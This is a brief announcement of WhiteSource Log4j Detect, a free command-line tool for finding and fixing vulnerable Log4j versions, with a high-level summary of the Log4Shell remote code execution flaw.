Following the high severity vulnerability (CVE-2021-44228) reported in the Apache Log4j2 library which was announced last Friday, our partner Whitesource Software has launched Whitesource Log4j Detect, a free command-line interface (CLI) tool to help organizations quickly detect and remediate the Log4j vulnerabilities CVE-2021-44228 and CVE-2021-445046.
This free developer tool, which is hosted on Github and is now available for use, quickly scans projects to find vulnerable Log4j versions and provides the exact path — both to direct or indirect dependencies — along with the fixed version for speedy remediation. As a standalone tool, developers can download the utility that matches their platform, run it within the terminal, and run the scan command on the root folder of the project.
Some background on the vulnerability. The vulnerability poses a major risk to applications as it allows remote code execution via the LDAP JNDI parser. The vulnerability in versions 2.14.1 and under of the Log4j library allows attackers that gain control over log messages or log message parameters to execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.